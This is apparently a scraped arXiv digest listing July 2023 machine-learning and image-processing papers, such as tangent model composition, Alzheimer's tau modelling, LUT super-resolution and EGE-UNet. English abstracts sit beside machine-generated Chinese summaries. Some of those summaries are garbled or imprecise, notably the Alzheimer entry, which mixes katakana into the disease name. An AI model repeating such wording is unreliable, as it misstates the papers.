  • results: 本论文的结果显示,使用BEIT架构进行领域通用化可以获得显著的提升,具体来说是在PACS、Home-Office和DomainNet三个benchmark上有着优秀的验证和测试准确率表现。此外,本论文的实现也能够填补在 Within-distribution和OOD数据之间的差距。
    Abstract Domain generalisation involves pooling knowledge from source domain(s) into a single model that can generalise to unseen target domain(s). Recent research in domain generalisation has faced challenges when using deep learning models as they interact with data distributions which differ from those they are trained on. Here we perform domain generalisation on out-of-distribution (OOD) vision benchmarks using vision transformers. Initially we examine four vision transformer architectures namely ViT, LeViT, DeiT, and BEIT on out-of-distribution data. As the bidirectional encoder representation from image transformers (BEIT) architecture performs best, we use it in further experiments on three benchmarks PACS, Home-Office and DomainNet. Our results show significant improvements in validation and test accuracy and our implementation significantly overcomes gaps between within-distribution and OOD data.
    摘要 领域泛化旨在把一个或多个源领域的知识汇入单一模型,使其能够泛化到未见过的目标领域。近年来,当深度学习模型遇到与训练分布不同的数据分布时,领域泛化研究面临诸多挑战。本文使用视觉 Transformer 在分布外(OOD)视觉基准上进行领域泛化。我们首先在 OOD 数据上考察了四种视觉 Transformer 架构:ViT、LeViT、DeiT 和 BEIT。由于基于图像 Transformer 的双向编码表示(BEIT)架构表现最佳,我们随后在 PACS、Home-Office 和 DomainNet 三个基准上用它开展进一步实验。结果显示验证与测试准确率均有显著提升,并且我们的实现显著缩小了分布内数据与 OOD 数据之间的差距。

Tangent Model Composition for Ensembling and Continual Fine-tuning

  • paper_url: http://arxiv.org/abs/2307.08114
  • repo_url: None
  • paper_authors: Tian Yu Liu, Stefano Soatto
  • for: 该方法用于组合围绕同一预训练点独立微调得到的模型,以支持增量学习、模型集成或遗忘学习。
  • methods: 该方法使用切线模型组合(TMC):组件模型是预训练模型的切向量,可在推理时相加、缩放或相减,并通过标量组合完成融合。
  • results: 与集成非线性微调模型相比,TMC 将准确率提升 4.2%,同时推理成本降低 2.5 至 10 倍,与单个模型相当;每个组件模型都可零成本遗忘,不留任何残余影响。
    Abstract Tangent Model Composition (TMC) is a method to combine component models independently fine-tuned around a pre-trained point. Component models are tangent vectors to the pre-trained model that can be added, scaled, or subtracted to support incremental learning, ensembling, or unlearning. Component models are composed at inference time via scalar combination, reducing the cost of ensembling to that of a single model. TMC improves accuracy by 4.2% compared to ensembling non-linearly fine-tuned models at a 2.5x to 10x reduction of inference cost, growing linearly with the number of component models. Each component model can be forgotten at zero cost, with no residual effect on the resulting inference. When used for continual fine-tuning, TMC is not constrained by sequential bias and can be executed in parallel on federated data. TMC outperforms recently published continual fine-tuning methods almost uniformly on each setting -- task-incremental, class-incremental, and data-incremental -- on a total of 13 experiments across 3 benchmark datasets, despite not using any replay buffer. TMC is designed for composing models that are local to a pre-trained embedding, but could be extended to more general settings.
    摘要 切线模型组合(TMC)是一种组合围绕同一预训练点独立微调得到的组件模型的方法。组件模型是预训练模型的切向量,可以相加、缩放或相减,从而支持增量学习、模型集成或遗忘学习。组件模型在推理时通过标量组合完成融合,使集成的推理成本降至单个模型的水平。与集成非线性微调模型相比,TMC 将准确率提升 4.2%,同时推理成本降低 2.5 至 10 倍(该倍数随组件模型数量线性增长)。每个组件模型都可以零成本遗忘,对最终推理不留任何残余影响。用于持续微调时,TMC 不受顺序偏差的限制,并可在联邦数据上并行执行。在 3 个基准数据集共 13 组实验中,TMC 在任务增量、类别增量和数据增量三种设定下几乎全面优于近期发表的持续微调方法,且无需使用任何回放缓冲区。TMC 面向组合局部于同一预训练嵌入的模型而设计,但可推广到更一般的设定。
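
Because each component is linear in its weight update, averaging component outputs collapses into a single tangent model evaluated at the averaged update, which is why the ensemble costs one forward pass. A toy NumPy check of this identity (with an invented scalar model, not the paper's architecture) is shown below.

```python
import numpy as np

rng = np.random.default_rng(0)
d = 8
theta0 = rng.normal(size=d)                                   # pre-trained weights
deltas = [rng.normal(scale=0.05, size=d) for _ in range(3)]   # independently fine-tuned components

def f0(x):                      # frozen pre-trained prediction (nonlinear in x)
    return np.tanh(x @ theta0)

def jacobian(x):                # d f / d theta evaluated at theta0, one row per sample
    return (1.0 - np.tanh(x @ theta0) ** 2)[:, None] * x

def tangent_model(delta, x):    # tangent component: linear in the weight update delta
    return f0(x) + jacobian(x) @ delta

x = rng.normal(size=(4, d))

# Scalar combination of component models collapses to a single tangent model,
# so the ensemble costs the same as one forward pass.
ensemble = np.mean([tangent_model(dlt, x) for dlt in deltas], axis=0)
single = tangent_model(np.mean(deltas, axis=0), x)
print(np.allclose(ensemble, single))   # True
```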

Discovering a reaction-diffusion model for Alzheimer’s disease by combining PINNs with symbolic regression

  • paper_url: http://arxiv.org/abs/2307.08107
  • repo_url: None
  • paper_authors: Zhen Zhang, Zongren Zou, Ellen Kuhl, George Em Karniadakis
  • for: 这些研究旨在描述阿尔ツ海默病的发展和病理过程中,蛋白质tau的折叠错误的角色。
  • methods: 这些研究使用深度学习和人工智能技术,以发现阿尔ツ海默病的数学模型。具体来说,他们使用物理学 Informed Neural Networks (PINNs) 和符号回归来发现tau蛋白质折叠错误的征化方程。
  • results: 这些研究发现,在46名可能发展阿尔ツ海默病的个体和30名健康控制群体的tau蛋白质扫描数据上,使用PINNs和符号回归可以发现不同的折叠模型,而且阿尔ツ海默病群体的折叠模型比健康控制群体快。这些结果表明,PINNs 和符号回归可以用于发现阿尔ツ海默病中tau蛋白质折叠错误的数学模型。
    Abstract Misfolded tau proteins play a critical role in the progression and pathology of Alzheimer's disease. Recent studies suggest that the spatio-temporal pattern of misfolded tau follows a reaction-diffusion type equation. However, the precise mathematical model and parameters that characterize the progression of misfolded protein across the brain remain incompletely understood. Here, we use deep learning and artificial intelligence to discover a mathematical model for the progression of Alzheimer's disease using longitudinal tau positron emission tomography from the Alzheimer's Disease Neuroimaging Initiative database. Specifically, we integrate physics informed neural networks (PINNs) and symbolic regression to discover a reaction-diffusion type partial differential equation for tau protein misfolding and spreading. First, we demonstrate the potential of our model and parameter discovery on synthetic data. Then, we apply our method to discover the best model and parameters to explain tau imaging data from 46 individuals who are likely to develop Alzheimer's disease and 30 healthy controls. Our symbolic regression discovers different misfolding models $f(c)$ for two groups, with a faster misfolding for the Alzheimer's group, $f(c) = 0.23c^3 - 1.34c^2 + 1.11c$, than for the healthy control group, $f(c) = -c^3 +0.62c^2 + 0.39c$. Our results suggest that PINNs, supplemented by symbolic regression, can discover a reaction-diffusion type model to explain misfolded tau protein concentrations in Alzheimer's disease. We expect our study to be the starting point for a more holistic analysis to provide image-based technologies for early diagnosis, and ideally early treatment of neurodegeneration in Alzheimer's disease and possibly other misfolding-protein based neurodegenerative disorders.
    摘要 错误折叠的 tau 蛋白在阿尔茨海默病的进展和病理中起着关键作用。最新研究表明,错误折叠 tau 的时空分布模式遵循一种反应-扩散型方程,但刻画错误折叠蛋白在脑内传播的精确数学模型及其参数仍未被完全理解。本文利用深度学习与人工智能,基于阿尔茨海默病神经影像计划(ADNI)数据库中的纵向 tau 正电子发射断层扫描数据,发现刻画阿尔茨海默病进展的数学模型。具体而言,我们将物理信息神经网络(PINNs)与符号回归相结合,发现描述 tau 蛋白错误折叠与扩散的反应-扩散型偏微分方程。我们首先在合成数据上展示了模型与参数发现的潜力,随后将该方法应用于 46 名可能发展为阿尔茨海默病的个体和 30 名健康对照的 tau 影像数据,以寻找最能解释数据的模型与参数。符号回归为两组人群发现了不同的错误折叠模型 $f(c)$:阿尔茨海默组的错误折叠更快,$f(c) = 0.23c^3 - 1.34c^2 + 1.11c$,而健康对照组为 $f(c) = -c^3 + 0.62c^2 + 0.39c$。结果表明,辅以符号回归的 PINNs 能够发现解释阿尔茨海默病中错误折叠 tau 蛋白浓度的反应-扩散型模型。我们期望这项研究成为更全面分析的起点,为阿尔茨海默病以及其他基于蛋白错误折叠的神经退行性疾病提供基于影像的早期诊断乃至早期治疗技术。
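
To get a feel for the two discovered reaction terms, one can integrate dc/dt = f(c) at a single location with forward Euler; ignoring the diffusion term and the chosen initial condition and time step are simplifying assumptions of this sketch.

```python
def f_ad(c):       # misfolding rate discovered for the Alzheimer's group
    return 0.23 * c**3 - 1.34 * c**2 + 1.11 * c

def f_hc(c):       # misfolding rate discovered for the healthy-control group
    return -c**3 + 0.62 * c**2 + 0.39 * c

# Forward-Euler integration of dc/dt = f(c) at one voxel, ignoring diffusion.
dt, steps = 0.05, 100
c_ad = c_hc = 0.05                     # assumed small initial misfolded concentration
for _ in range(steps):
    c_ad += dt * f_ad(c_ad)
    c_hc += dt * f_hc(c_hc)
print(f"after t = {dt * steps:.0f}: AD concentration {c_ad:.2f}, control {c_hc:.2f}")
```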

Using Decision Trees for Interpretable Supervised Clustering

  • paper_url: http://arxiv.org/abs/2307.08104
  • repo_url: https://github.com/sayantann11/all-classification-templetes-for-ML
  • paper_authors: Natallia Kokash, Leonid Makhnist
  • for: 本研究探讨了对标注数据集中的分类数据进行可解释的分群问题,即interpretable supervised clustering。
  • methods: 本文提出了一种迭代方法,使用基于决策树的分类器作为最直观的学习方法,并讨论了节点选择方法以提高分群质量。
  • results: 本文获得了高密度分群,并通过描述分群的规则集来描述分群。
    Abstract In this paper, we address an issue of finding explainable clusters of class-uniform data in labelled datasets. The issue falls into the domain of interpretable supervised clustering. Unlike traditional clustering, supervised clustering aims at forming clusters of labelled data with high probability densities. We are particularly interested in finding clusters of data of a given class and describing the clusters with the set of comprehensive rules. We propose an iterative method to extract high-density clusters with the help of decisiontree-based classifiers as the most intuitive learning method, and discuss the method of node selection to maximize quality of identified groups.
    摘要 本文研究在带标签数据集中寻找类别一致数据的可解释簇的问题,该问题属于可解释监督聚类的范畴。与传统聚类不同,监督聚类旨在形成具有高概率密度的带标签数据簇。我们尤其关注寻找给定类别数据的簇,并用一组完备的规则来描述这些簇。我们提出一种迭代方法,借助基于决策树的分类器这一最直观的学习方法来提取高密度簇,并讨论了如何选择节点以最大化所识别分组的质量。
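
A minimal scikit-learn sketch of the leaves-as-clusters idea: fit a shallow decision tree on labelled data, keep leaves dominated by the class of interest as explainable clusters, and read off their rules. The purity threshold and synthetic data are arbitrary assumptions, and the paper's iterative node-selection procedure is not reproduced.

```python
import numpy as np
from sklearn.datasets import make_classification
from sklearn.tree import DecisionTreeClassifier, export_text

X, y = make_classification(n_samples=600, n_features=4, n_informative=3,
                           n_redundant=0, random_state=0)

# A shallow tree keeps the leaves, and hence the clusters, human-readable.
tree = DecisionTreeClassifier(max_depth=3, min_samples_leaf=30, random_state=0).fit(X, y)

# Treat each leaf dominated by the class of interest as one explainable cluster.
leaf_of = tree.apply(X)
target = 1
for leaf in np.unique(leaf_of):
    members = y[leaf_of == leaf]
    purity = (members == target).mean()
    if purity >= 0.9:
        print(f"leaf {leaf}: {len(members)} points, purity {purity:.2f}")

print(export_text(tree, feature_names=[f"x{i}" for i in range(4)]))
```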

A max-affine spline approximation of neural networks using the Legendre transform of a convex-concave representation

  • paper_url: http://arxiv.org/abs/2307.09602
  • repo_url: https://github.com/adamgoodtime/legendre_net
  • paper_authors: Adam Perrett, Danny Wood, Gavin Brown
  • for: 该 paper 的目的是提出一种将神经网络转换为spline表示的算法。
  • methods: 该算法不需要 convex 和 piecewise-affine 网络操作符,而是关注函数的 bounded-ness 和 second derivative 的定义性。
  • results: 该算法可以在整个网络中进行,而不仅仅是在每层独立进行。这种方法可以 bridge 神经网络和近似理论之间,同时允许抽象网络特征图。实验证明了该算法的正确性和效果。
    Abstract This work presents a novel algorithm for transforming a neural network into a spline representation. Unlike previous work that required convex and piecewise-affine network operators to create a max-affine spline alternate form, this work relaxes this constraint. The only constraint is that the function be bounded and possess a well-define second derivative, although this was shown experimentally to not be strictly necessary. It can also be performed over the whole network rather than on each layer independently. As in previous work, this bridges the gap between neural networks and approximation theory but also enables the visualisation of network feature maps. Mathematical proof and experimental investigation of the technique is performed with approximation error and feature maps being extracted from a range of architectures, including convolutional neural networks.
    摘要 本文提出了一种将神经网络变换为样条表示的新算法。与以往需要凸且分段仿射的网络算子才能构造最大仿射样条(max-affine spline)等价形式的工作不同,本文放宽了这一约束:唯一的要求是函数有界且二阶导数有良好定义,而实验表明后者也并非严格必要。此外,该算法可以作用于整个网络,而不必逐层独立进行。与以往工作一样,这弥合了神经网络与逼近理论之间的鸿沟,同时还使网络特征图的可视化成为可能。本文对该技术给出了数学证明和实验研究,并在包括卷积神经网络在内的多种架构上提取了逼近误差与特征图。

EasyTPP: Towards Open Benchmarking the Temporal Point Processes

  • paper_url: http://arxiv.org/abs/2307.08097
  • repo_url: https://github.com/ant-research/easytemporalpointprocess
  • paper_authors: Siqiao Xue, Xiaoming Shi, Zhixuan Chu, Yan Wang, Fan Zhou, Hongyan Hao, Caigao Jiang, Chen Pan, Yi Xu, James Y. Zhang, Qingsong Wen, Jun Zhou, Hongyuan Mei
  • for: This paper is written to establish a central benchmark for evaluating temporal point processes (TPPs) in order to promote reproducible research and accelerate progress in the field.
  • methods: The paper uses eight highly cited neural TPPs and integrates commonly used evaluation metrics and datasets into a standardized benchmarking pipeline. The benchmark is implemented in a universal framework that supports multiple machine learning libraries and custom implementations.
  • results: The paper presents a comprehensive implementation of TPPs and a standardized benchmarking pipeline for comparing different methods on different datasets, which can help promote reproducible research and accelerate progress in the field. The benchmark is open-sourced and available at a Github repository.
    Abstract Continuous-time event sequences play a vital role in real-world domains such as healthcare, finance, online shopping, social networks, and so on. To model such data, temporal point processes (TPPs) have emerged as the most advanced generative models, making a significant impact in both academic and application communities. Despite the emergence of many powerful models in recent years, there is still no comprehensive benchmark to evaluate them. This lack of standardization impedes researchers and practitioners from comparing methods and reproducing results, potentially slowing down progress in this field. In this paper, we present EasyTPP, which aims to establish a central benchmark for evaluating TPPs. Compared to previous work that also contributed datasets, our EasyTPP has three unique contributions to the community: (i) a comprehensive implementation of eight highly cited neural TPPs with the integration of commonly used evaluation metrics and datasets; (ii) a standardized benchmarking pipeline for a transparent and thorough comparison of different methods on different datasets; (iii) a universal framework supporting multiple ML libraries (e.g., PyTorch and TensorFlow) as well as custom implementations. Our benchmark is open-sourced: all the data and implementation can be found at this \href{https://github.com/ant-research/EasyTemporalPointProcess}{\textcolor{blue}{Github repository}\footnote{\url{https://github.com/ant-research/EasyTemporalPointProcess}.}. We will actively maintain this benchmark and welcome contributions from other researchers and practitioners. Our benchmark will help promote reproducible research in this field, thus accelerating research progress as well as making more significant real-world impacts.
    摘要 连续时间事件序列在医疗、金融、网上购物、社交网络等现实领域中扮演着重要角色。为对此类数据建模,时间点过程(TPP)已成为最先进的生成模型,在学术界和应用界产生了深远影响。尽管近年来涌现了许多强大的模型,但仍缺乏一个全面的基准来评估它们;这种标准化的缺失使研究者和从业者难以比较方法、复现结果,可能拖慢该领域的进展。本文提出 EasyTPP,旨在建立评估 TPP 的集中基准。与以往同样贡献数据集的工作相比,EasyTPP 为社区带来三项独特贡献:(i)完整实现了八个高被引的神经 TPP 模型,并集成常用的评估指标与数据集;(ii)提供标准化的基准测试流程,使不同方法在不同数据集上的比较透明而全面;(iii)提供支持多种机器学习库(如 PyTorch 和 TensorFlow)及自定义实现的通用框架。我们的基准已开源,所有数据和实现可在 https://github.com/ant-research/EasyTemporalPointProcess 获取。我们将积极维护该基准,并欢迎其他研究者和从业者贡献。该基准将促进本领域的可复现研究,从而加速研究进展并产生更显著的现实影响。

A Comprehensive Survey of Forgetting in Deep Learning Beyond Continual Learning

  • paper_url: http://arxiv.org/abs/2307.09218
  • repo_url: https://github.com/ennengyang/awesome-forgetting-in-deep-learning
  • paper_authors: Zhenyi Wang, Enneng Yang, Li Shen, Heng Huang
  • for: This paper is written to provide a comprehensive survey of forgetting in deep learning, beyond its conventional boundaries, and to explore the potential advantages of forgetting in certain cases, such as privacy-preserving scenarios.
  • methods: The paper uses a broad range of methods to examine forgetting in various research domains within deep learning, including generative models and federated learning. It also draws upon ideas and approaches from other fields that have dealt with forgetting.
  • results: The paper presents a nuanced understanding of forgetting as a double-edged sword, highlighting its potential advantages in certain cases, and provides a comprehensive list of papers about forgetting in various research fields. It encourages the development of novel strategies for mitigating, harnessing, or even embracing forgetting in real applications.
    Abstract Forgetting refers to the loss or deterioration of previously acquired information or knowledge. While the existing surveys on forgetting have primarily focused on continual learning, forgetting is a prevalent phenomenon observed in various other research domains within deep learning. Forgetting manifests in research fields such as generative models due to generator shifts, and federated learning due to heterogeneous data distributions across clients. Addressing forgetting encompasses several challenges, including balancing the retention of old task knowledge with fast learning of new tasks, managing task interference with conflicting goals, and preventing privacy leakage, etc. Moreover, most existing surveys on continual learning implicitly assume that forgetting is always harmful. In contrast, our survey argues that forgetting is a double-edged sword and can be beneficial and desirable in certain cases, such as privacy-preserving scenarios. By exploring forgetting in a broader context, we aim to present a more nuanced understanding of this phenomenon and highlight its potential advantages. Through this comprehensive survey, we aspire to uncover potential solutions by drawing upon ideas and approaches from various fields that have dealt with forgetting. By examining forgetting beyond its conventional boundaries, in future work, we hope to encourage the development of novel strategies for mitigating, harnessing, or even embracing forgetting in real applications. A comprehensive list of papers about forgetting in various research fields is available at \url{https://github.com/EnnengYang/Awesome-Forgetting-in-Deep-Learning}.
    摘要 遗忘指的是先前获得的信息或知识的丢失或退化。现有关于遗忘的综述主要集中在持续学习,但遗忘其实是深度学习多个研究领域中普遍存在的现象:例如生成模型中由生成器偏移引起的遗忘,以及联邦学习中由客户端数据分布异构引起的遗忘。应对遗忘面临多重挑战,包括在保留旧任务知识与快速学习新任务之间取得平衡、处理目标相互冲突的任务干扰、防止隐私泄露等。此外,多数现有的持续学习综述都隐含假设遗忘总是有害的;与之相反,本综述认为遗忘是一把双刃剑,在某些情形(如隐私保护场景)中可能是有益且值得追求的。通过在更广的语境下考察遗忘,我们希望呈现对这一现象更细致的理解,并突出其潜在优势。通过这份全面的综述,我们希望借鉴其他处理过遗忘问题的领域中的思想与方法,发掘潜在的解决方案;在未来工作中,通过跳出传统边界来审视遗忘,鼓励人们为实际应用开发缓解、利用乃至拥抱遗忘的新策略。关于各研究领域中遗忘问题的完整论文列表见 \url{https://github.com/EnnengYang/Awesome-Forgetting-in-Deep-Learning}。

eess.IV - 2023-07-17

Reconstructed Convolution Module Based Look-Up Tables for Efficient Image Super-Resolution

  • paper_url: http://arxiv.org/abs/2307.08544
  • repo_url: https://github.com/liuguandu/rc-lut
  • paper_authors: Guandu Liu, Yukang Ding, Mading Li, Ming Sun, Xing Wen, Bin Wang
  • for: 提高单个图像超分解(SR)任务的效果
  • methods: 使用新型的重构卷积(RC)模块,将通道与空间计算解耦,从而在保持 $n\times n$ 感受野的同时降低 LUT 体积
  • results: 与最先进的基于 LUT 的超分方法相比,所提出的 RCLUT 方法能将感受野扩大 9 倍,在 5 个常用基准数据集上表现优异,并且其 RC 模块可作为插件改进其他基于 LUT 的超分方法。
    Abstract Look-up table(LUT)-based methods have shown the great efficacy in single image super-resolution (SR) task. However, previous methods ignore the essential reason of restricted receptive field (RF) size in LUT, which is caused by the interaction of space and channel features in vanilla convolution. They can only increase the RF at the cost of linearly increasing LUT size. To enlarge RF with contained LUT sizes, we propose a novel Reconstructed Convolution(RC) module, which decouples channel-wise and spatial calculation. It can be formulated as $n^2$ 1D LUTs to maintain $n\times n$ receptive field, which is obviously smaller than $n\times n$D LUT formulated before. The LUT generated by our RC module reaches less than 1/10000 storage compared with SR-LUT baseline. The proposed Reconstructed Convolution module based LUT method, termed as RCLUT, can enlarge the RF size by 9 times than the state-of-the-art LUT-based SR method and achieve superior performance on five popular benchmark dataset. Moreover, the efficient and robust RC module can be used as a plugin to improve other LUT-based SR methods. The code is available at https://github.com/liuguandu/RC-LUT.
    摘要 基于查找表(LUT)的方法在单幅图像超分辨率(SR)任务中展现了出色的效果。然而,以往方法忽视了 LUT 中感受野(RF)受限的根本原因:普通卷积中空间特征与通道特征的相互耦合,导致只能以 LUT 体积线性增长为代价来扩大感受野。为了在控制 LUT 体积的同时扩大感受野,我们提出了一种新的重构卷积(RC)模块,将通道方向与空间方向的计算解耦:它可以表示为 $n^2$ 个一维 LUT,即可维持 $n\times n$ 的感受野,显然远小于此前所需的 $n\times n$ 维 LUT。我们的 RC 模块生成的 LUT 存储量不到 SR-LUT 基线的万分之一。所提出的基于重构卷积模块的 LUT 方法(RCLUT)能将感受野扩大为当前最优 LUT 超分方法的 9 倍,并在五个常用基准数据集上取得更优性能。此外,这一高效且稳健的 RC 模块还可以作为插件来改进其他基于 LUT 的超分方法。代码见 https://github.com/liuguandu/RC-LUT。
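
A back-of-the-envelope comparison of table sizes: a joint LUT over an n × n receptive field indexes all pixel combinations at once, whereas the reconstructed convolution uses n² one-dimensional tables. The 8-bit, unquantized indexing below is an idealized assumption (practical LUT SR methods quantize indices), so the numbers only illustrate the scaling, not the paper's exact storage figures.

```python
# Rough storage comparison for an n x n receptive field with v possible input values per pixel.
n, v = 3, 2 ** 8
joint_lut_entries = v ** (n * n)        # joint (n*n)-dimensional table over all pixel combinations
rc_lut_entries = (n * n) * v            # n^2 independent one-dimensional tables
print(f"joint {n}x{n} LUT : {joint_lut_entries:.3e} entries")
print(f"RC (n^2 x 1-D) LUT: {rc_lut_entries} entries")
```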

Study of Vision Transformers for Covid-19 Detection from Chest X-rays

  • paper_url: http://arxiv.org/abs/2307.09402
  • repo_url: None
  • paper_authors: Sandeep Angara, Sharath Thirunagaru
  • for: 这个研究旨在检测 COVID-19 病毒,使用视觉转换器进行检测,以提高检测效率和准确率。
  • methods: 本研究使用了许多现代的视觉转换器模型,包括 Vision Transformer (ViT)、Swin-transformer、Max vision transformer (MViT) 和 Pyramid Vision transformer (PVT),通过转移学习IMAGENET 权重来实现高度的检测精度。
  • results: 实验结果显示,视觉 Transformer 模型在 COVID-19 检测中达到了最先进的性能(准确率 98.75% 至 99.5%),超越了传统方法和卷积神经网络(CNN),凸显了视觉 Transformer 作为 COVID-19 检测有力工具的潜力。
    Abstract The COVID-19 pandemic has led to a global health crisis, highlighting the need for rapid and accurate virus detection. This research paper examines transfer learning with vision transformers for COVID-19 detection, known for its excellent performance in image recognition tasks. We leverage the capability of Vision Transformers to capture global context and learn complex patterns from chest X-ray images. In this work, we explored the recent state-of-art transformer models to detect Covid-19 using CXR images such as vision transformer (ViT), Swin-transformer, Max vision transformer (MViT), and Pyramid Vision transformer (PVT). Through the utilization of transfer learning with IMAGENET weights, the models achieved an impressive accuracy range of 98.75% to 99.5%. Our experiments demonstrate that Vision Transformers achieve state-of-the-art performance in COVID-19 detection, outperforming traditional methods and even Convolutional Neural Networks (CNNs). The results highlight the potential of Vision Transformers as a powerful tool for COVID-19 detection, with implications for improving the efficiency and accuracy of screening and diagnosis in clinical settings.
    摘要 COVID-19 大流行引发了全球公共卫生危机,凸显了快速、准确检测病毒的需求。本文研究利用视觉 Transformer 进行迁移学习以检测 COVID-19,这类模型以其在图像识别任务中的出色表现而著称。我们利用视觉 Transformer 捕捉全局上下文并从胸部 X 光图像中学习复杂模式的能力,考察了最新的 Transformer 模型在 CXR 图像上检测 COVID-19 的效果,包括视觉 Transformer(ViT)、Swin-Transformer、Max 视觉 Transformer(MViT)和金字塔视觉 Transformer(PVT)。通过加载 IMAGENET 预训练权重进行迁移学习,这些模型取得了 98.75% 至 99.5% 的优异准确率。实验表明,视觉 Transformer 在 COVID-19 检测上达到了最先进的性能,超越了传统方法乃至卷积神经网络(CNN)。这些结果显示了视觉 Transformer 作为 COVID-19 检测有力工具的潜力,有望提升临床筛查与诊断的效率和准确性。

EGE-UNet: an Efficient Group Enhanced UNet for skin lesion segmentation

  • paper_url: http://arxiv.org/abs/2307.08473
  • repo_url: https://github.com/jcruan519/ege-unet
  • paper_authors: Jiacheng Ruan, Mingye Xie, Jingsheng Gao, Ting Liu, Yuzhuo Fu
  • for: 这篇论文旨在提出一种更高效的医学图像分割方法,以便应用于移动健康应用。
  • methods: 论文提出了高效分组增强 UNet(EGE-UNet),以轻量化方式组合了分组多轴哈达玛积注意力模块(GHPA)和分组聚合桥接模块(GAB),在提高分割精度的同时降低计算开销。
  • results: 实验结果表明,EGE-UNet 的分割性能优于现有方法,并将参数量和计算量分别降低了 494 倍和 160 倍;此外,这是首个参数规模仅 50KB 的模型。
    Abstract Transformer and its variants have been widely used for medical image segmentation. However, the large number of parameter and computational load of these models make them unsuitable for mobile health applications. To address this issue, we propose a more efficient approach, the Efficient Group Enhanced UNet (EGE-UNet). We incorporate a Group multi-axis Hadamard Product Attention module (GHPA) and a Group Aggregation Bridge module (GAB) in a lightweight manner. The GHPA groups input features and performs Hadamard Product Attention mechanism (HPA) on different axes to extract pathological information from diverse perspectives. The GAB effectively fuses multi-scale information by grouping low-level features, high-level features, and a mask generated by the decoder at each stage. Comprehensive experiments on the ISIC2017 and ISIC2018 datasets demonstrate that EGE-UNet outperforms existing state-of-the-art methods. In short, compared to the TransFuse, our model achieves superior segmentation performance while reducing parameter and computation costs by 494x and 160x, respectively. Moreover, to our best knowledge, this is the first model with a parameter count limited to just 50KB. Our code is available at https://github.com/JCruan519/EGE-UNet.
    摘要 Transformer 及其变体已被广泛用于医学图像分割,但这些模型庞大的参数量和计算开销使其难以用于移动医疗应用。为此,我们提出了一种更高效的方法——高效分组增强 UNet(EGE-UNet)。我们以轻量化方式引入了分组多轴哈达玛积注意力模块(GHPA)和分组聚合桥接模块(GAB):GHPA 将输入特征分组,并在不同轴上执行哈达玛积注意力机制(HPA),从多个视角提取病理信息;GAB 通过在每个阶段对低层特征、高层特征以及解码器生成的掩码进行分组,有效融合多尺度信息。在 ISIC2017 和 ISIC2018 数据集上的大量实验表明,EGE-UNet 超越了现有的最先进方法。简而言之,与 TransFuse 相比,我们的模型在取得更优分割性能的同时,将参数量和计算量分别降低了 494 倍和 160 倍。此外,据我们所知,这是首个参数规模仅 50KB 的模型。代码见 https://github.com/JCruan519/EGE-UNet。

Domain Adaptation using Silver Standard Masks for Lateral Ventricle Segmentation in FLAIR MRI

  • paper_url: http://arxiv.org/abs/2307.08456
  • repo_url: None
  • paper_authors: Owen Crystal, Pejman J. Maralani, Sandra Black, Alan R. Moody, April Khademi
  • for: 这项研究提出了一种基于迁移学习的侧脑室体积(LVV)分割方法,用于 FLAIR MRI 图像。
  • methods: 该方法采用域适应技术,在目标域上用一种新的传统图像处理脑室分割算法生成银标准(SS)掩码,以优化在三个目标数据集上的性能。
  • results: 测试结果表明,SS+GS 模型(先在目标域 SS 掩码上训练,再在源域 GS 掩码上微调)在三个目标域上取得了最佳且最稳定的性能(平均 DSC = 0.89,CoV = 0.05),并显著优于仅用源域 GS 训练的模型(p < 0.05)。这表明利用目标域生成的含噪标签可以帮助模型适应数据集特有的特性,并提供稳健的参数初始化。
    Abstract Lateral ventricular volume (LVV) is an important biomarker for clinical investigation. We present the first transfer learning-based LVV segmentation method for fluid-attenuated inversion recovery (FLAIR) MRI. To mitigate covariate shifts between source and target domains, this work proposes an domain adaptation method that optimizes performance on three target datasets. Silver standard (SS) masks were generated from the target domain using a novel conventional image processing ventricular segmentation algorithm and used to supplement the gold standard (GS) data from the source domain, Canadian Atherosclerosis Imaging Network (CAIN). Four models were tested on held-out test sets from four datasets: 1) SS+GS: trained on target SS masks and fine-tuned on source GS masks, 2) GS+SS: trained on source GS masks and fine-tuned on target SS masks, 3) trained on source GS (GS CAIN Only) and 4) trained on target SS masks (SS Only). The SS+GS model had the best and most consistent performance (mean DSC = 0.89, CoV = 0.05) and showed significantly (p < 0.05) higher DSC compared to the GS-only model on three target domains. Results suggest pre-training with noisy labels from the target domain allows the model to adapt to the dataset-specific characteristics and provides robust parameter initialization while fine-tuning with GS masks allows the model to learn detailed features. This method has wide application to other medical imaging problems where labeled data is scarce, and can be used as a per-dataset calibration method to accelerate wide-scale adoption.
    摘要 侧脑室体积(LVV)是临床研究中的重要生物标志物。本文提出了首个基于迁移学习的 FLAIR MRI 侧脑室分割方法。为缓解源域与目标域之间的协变量偏移,本文提出一种在三个目标数据集上优化性能的域适应方法:利用一种新的传统图像处理脑室分割算法从目标域生成银标准(SS)掩码,用以补充来自源域(加拿大动脉粥样硬化影像网络,CAIN)的金标准(GS)数据。我们在四个数据集的保留测试集上测试了四种模型:1) SS+GS:先在目标域 SS 掩码上训练,再在源域 GS 掩码上微调;2) GS+SS:先在源域 GS 掩码上训练,再在目标域 SS 掩码上微调;3) 仅在源域 GS 上训练(GS CAIN Only);4) 仅在目标域 SS 掩码上训练(SS Only)。SS+GS 模型表现最佳且最稳定(平均 DSC = 0.89,CoV = 0.05),在三个目标域上的 DSC 显著高于仅用 GS 的模型(p < 0.05)。结果表明,利用目标域的含噪标签进行预训练可以让模型适应数据集特有的特性并提供稳健的参数初始化,而用 GS 掩码微调则让模型学习到细节特征。该方法可广泛应用于标注数据稀缺的其他医学影像问题,并可作为按数据集校准的手段,加速大规模推广应用。

Dynamic Snake Convolution based on Topological Geometric Constraints for Tubular Structure Segmentation

  • paper_url: http://arxiv.org/abs/2307.08388
  • repo_url: https://github.com/yaoleiqi/dscnet
  • paper_authors: Yaolei Qi, Yuting He, Xiaoming Qi, Yuan Zhang, Guanyu Yang
  • for: 提高血管、道路等 tubular 结构分割的准确性和效率,以保证各领域下游任务的准确与高效。
  • methods: 使用动态蛇形卷积 (dynamic snake convolution) 自适应聚焦于细长弯曲的局部结构,精确捕捉 tubular 结构的特征;并提出多视图特征融合策略,在特征融合阶段从多个视角补充对特征的关注,保留不同全局形态中的重要信息。
  • results: 在 2D 和 3D 数据集上的实验表明,DSCNet 在 tubular 结构分割任务上相比多种现有方法取得了更高的准确性和连续性。
